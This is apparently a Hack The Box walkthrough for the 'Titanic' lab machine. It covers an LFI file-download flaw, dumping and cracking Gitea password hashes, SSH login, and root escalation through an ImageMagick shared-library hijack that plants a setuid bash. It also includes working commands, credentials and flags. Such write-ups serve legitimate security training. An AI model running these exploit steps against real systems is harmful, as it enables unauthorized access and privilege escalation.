Titanic

Recon

HTTP (80)

Only thing that works on website is Book Now

LFI

We might be user developer since we can read the home files

Server is apache and application is lives in /var/www/html

Scratch that...

Same config is inside /etc/apache2/sites-available/titanic.conf

../app.py to get app source code

/etc/hosts has another subdomain

Dev Subdomain

http://dev.titanic.htb/developer/flask-app/commit/f747049bc949526d9cd9bd45cfaeed6f6db92496 http://dev.titanic.htb/developer/flask-app/commit/699639b37d9542cc26c3707a9dd9194f1cba4696

{"name": "Jack Dawson", "email": "jack.dawson@titanic.htb", "phone": "555-123-4567", "date": "2024-08-23", "cabin": "Standard"}
{"name": "Rose DeWitt Bukater", "email": "rose.bukater@titanic.htb", "phone": "643-999-021", "date": "2024-08-22", "cabin": "Suite"}

MySQL root password: MySQLP@$$w0rd!

Gitea database can be dumped

└─$ curl http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/gitea.db -so gitea.db
└─$ sqlitebrowser gitea.db

Convert to hashes

└─$ sqlite3 gitea.db "SELECT REPLACE(name || ':' || 'sha256:50000:' || BASE64(UNHEX(salt)) || ':' || BASE64(UNHEX(passwd)),CHAR(10),'') FROM user"
administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=

Crack developer password

➜ .\hashcat.exe -a 0 -m 10900 --user .\hashes.txt .\rockyou.txt
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=:25282528

SSH (22)

└─$ sshpass -p '25282528' ssh developer@titanic.htb
developer@titanic:~$ id
uid=1000(developer) gid=1000(developer) groups=1000(developer)

User.txt

developer@titanic:~$ cat user.txt
33f47ac790d0e519063f99a3184c4c3c

Privilege Escalation

No sudo privs

developer@titanic:~$ sudo -l
Sorry, user developer may not run sudo on titanic.

Let this run to catch any cronjobs

└─$ sshpass -p '25282528' scp /opt/scripts/enum/pspy64 developer@titanic.htb:/tmp/pspy
└─$ sshpass -p '25282528' ssh developer@titanic.htb 'chmod +x /tmp/pspy'
└─$ sshpass -p '25282528' ssh developer@titanic.htb '/tmp/pspy'

We can't SSH into docker container without private key and 37409 is unknown service.

developer@titanic:~$ ss -tunlp4
Netid State  Recv-Q Send-Q   Local Address:Port    Peer Address:Port Process
udp   UNCONN 0      0        127.0.0.53%lo:53           0.0.0.0:*
udp   UNCONN 0      0              0.0.0.0:68           0.0.0.0:*
tcp   LISTEN 0      4096     127.0.0.53%lo:53           0.0.0.0:*
tcp   LISTEN 0      128          127.0.0.1:5000         0.0.0.0:*     users:(("python3",pid=1141,fd=3))
tcp   LISTEN 0      4096         127.0.0.1:3000         0.0.0.0:*
tcp   LISTEN 0      4096         127.0.0.1:37409        0.0.0.0:*
tcp   LISTEN 0      4096         127.0.0.1:2222         0.0.0.0:*
tcp   LISTEN 0      128            0.0.0.0:22           0.0.0.0:*

developer@titanic:~$ curl 0:37409/;echo
404: Page Not Found

There's some kind of script in /opt/scripts used to identify metadata of images..

developer@titanic:/opt/scripts$ ls -lAh
total 4.0K
-rwxr-xr-x 1 root root 167 Feb  3 17:11 identify_images.sh
developer@titanic:/opt/scripts$ cat identify_images.sh
cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log

Yeap, it's cronjob

developer@titanic:/opt/app/static/assets/images$ ls -alh metadata.log
-rw-r----- 1 root developer 442 Feb 15 20:22 metadata.log
developer@titanic:/opt/app/static/assets/images$ ls -alh metadata.log
-rw-r----- 1 root developer 546 Feb 15 20:23 metadata.log

developer@titanic:/opt/app/static/assets/images$ magick --version
Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype heic jbig jng jp2 jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (9.4)

Arbitrary Code Execution in AppImage version ImageMagick

Env variables don't exist so it will default to current directory which we can hijack

developer@titanic:/opt/app/static/assets/images$ printenv | grep -E 'LD_LIBRARY_PATH|MAGICK_CONFIGURE_PATH'

gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){ system("install -m4777 /bin/bash /tmp/rootbash"); exit(0); }
EOF

developer@titanic:/opt/app/static/assets/images$ ls -l /tmp/rootbash
ls: cannot access '/tmp/rootbash': No such file or directory
developer@titanic:/opt/app/static/assets/images$ ls -l /tmp/rootbash
-rwsrwxrwx 1 root root 1396520 Feb 15 20:34 /tmp/rootbash
developer@titanic:/opt/app/static/assets/images$ /tmp/rootbash -p
rootbash-5.1# id
uid=1000(developer) gid=1000(developer) euid=0(root) groups=1000(developer)

Root.txt

rootbash-5.1# cat /root/root.txt
fda3ebb9df0d6d6a09c689d76dc24d7b

PreviousTheFrizz NextWhiteRabbit

Last updated 7 months ago

hashtagRecon

hashtagHTTP (80)

hashtagLFI

hashtagDev Subdomain

hashtagSSH (22)

hashtagUser.txt

hashtagPrivilege Escalation

hashtagRoot.txt